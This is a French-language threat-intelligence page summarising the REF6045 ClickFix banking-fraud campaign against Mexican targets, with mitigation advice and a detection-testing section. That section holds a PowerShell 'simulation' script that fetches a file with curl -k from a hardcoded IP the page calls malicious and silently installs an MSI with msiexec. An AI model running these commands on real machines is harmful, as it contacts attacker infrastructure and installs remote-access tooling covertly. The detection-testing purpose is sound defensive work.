SOC Prime Bias: Élevé

08 Jul 2026 16:15 UTC

ClickFix à Cash-Out : Décomposition d’un kit de fraude bancaire mexicain

Author Photo
SOC Prime Team linkedin icon Suivre
ClickFix à Cash-Out : Décomposition d’un kit de fraude bancaire mexicain
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

REF6045 est une campagne de fraude bancaire assistée par opérateur ciblant le secteur financier mexicain. Elle utilise une méthode de livraison de type ClickFix avec de fausses pages CAPTCHA pour convaincre les victimes d’exécuter des commandes PowerShell malveillantes. Après infection, l’outil SCMBANKER permet aux opérateurs humains d’observer les sessions bancaires, de capturer des captures d’écran, de modifier le contenu du presse-papiers, et de déployer Remote Utilities RAT pour un contrôle à distance complet.

Enquête

Les laboratoires Elastic Security ont découvert la menace après avoir détecté des bitsadmin activités suspectes téléchargeant des scripts PowerShell depuis un répertoire ouvert. L’enquête a exposé l’ensemble de l’outil via une archive web-root accessible publiquement, zkt.zip, et a révélé des failles majeures de sécurité opérationnelle, y compris des éditeurs de fichiers non authentifiés et des répertoires ouverts sur l’infrastructure de commande et de contrôle. L’analyse a également montré que l’outil contient de nombreux artefacts générés par IA dans sa base de code.

Atténuation

Les organisations devraient limiter l’utilisation de PowerShell et bitsadmin aux utilisateurs approuvés et appliquer des contrôles stricts d’exécution. Les utilisateurs doivent être formés à identifier les leurres d’ingénierie sociale tels que les faux invites CAPTCHA ou les faux écrans de mise à jour Windows. Les équipes de sécurité devraient également déployer une surveillance renforcée des changements de registre suspects et de l’installation non autorisée de logiciels d’accès à distance.

Réponse

Si cette activité est détectée, isolez immédiatement les systèmes affectés pour stopper la communication de commande et de contrôle et le vol potentiel de données. Menez une enquête judiciaire pour déterminer l’étendue du compromis et vérifiez la présence de Remote Utilities ou de modifications non autorisées du registre. Réinitialisez les mots de passe de tous les comptes financiers et autres comptes sensibles accédés depuis les machines affectées.

Flux d’Attaque

Exécution de simulation

Prérequis: La vérification préliminaire de télémétrie & de base doit avoir été réussie.

Justification: Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Les exemples abstraits ou non liés entraîneront un mauvais diagnostic.

  • Récit d’attaque & Commandes: L’adversaire vise à établir un point d’appui sur le système cible en imitant le modèle de fraude bancaire REF6045. D’abord, ils tentent de télécharger un fichier de validation depuis une adresse IP malveillante codée en dur (68.211.161.46) en utilisant curl avec le drapeau -k (insecure) pour contourner la validation du certificat SSL. Après le téléchargement, l’adversaire exécute une installation silencieuse d’un outil d’accès à distance malveillant en utilisant msiexec.exe avec le drapeau /i (install) et /quiet (silencieux), en ciblant un fichier nommé hosts.msi. Cela leur fournit un accès à distance persistant tout en minimisant l’interaction utilisateur.

  • Script de test de régression:

    # Script de simulation pour les TTPs REF6045
    # Ce script imite les lignes de commande spécifiques définies dans la règle de détection.
    
    $WorkDir = "$env:TEMPSimulation"
    if (!(Test-Path $WorkDir)) { New-Item -ItemType Directory -Path $WorkDir }
    Set-Location $WorkDir
    
    Write-Host "[+] Étape 1: Simulation de transfert d'outil via curl..." -ForegroundColor Cyan
    # Note: Utilisation d'un fichier factice via curl pour éviter un trafic réellement malveillant,
    # mais en maintenant la chaîne exacte de ligne de commande requise pour la détection.
    cmd /c curl -k https://68.211.161.46/validation.txt
    
    Write-Host "[+] Étape 2: Simulation d'installation MSI silencieuse..." -ForegroundColor Cyan
    # Créez un fichier MSI factice pour que msiexec ne tombe pas immédiatement en erreur (bien que la règle déclenche sur la ligne de commande)
    # Dans le but de tester uniquement la LOGIQUE DE DÉTECTION (la ligne de commande),
    # nous exécuterons la chaîne de commande exacte.
    msiexec /i "hosts.msi" /quiet /norestart
  • Commandes de nettoyage:

    # Script de nettoyage pour supprimer les artefacts
    $WorkDir = "$env:TEMPSimulation"
    if (Test-Path $WorkDir) {
        Remove-Item -Recurse -Force $WorkDir
        Write-Host "[+] Nettoyage terminé: $WorkDir supprimé." -ForegroundColor Green
    } else {
        Write-Host "[!] Nettoyage sauté: Répertoire non trouvé." -ForegroundColor Yellow
    }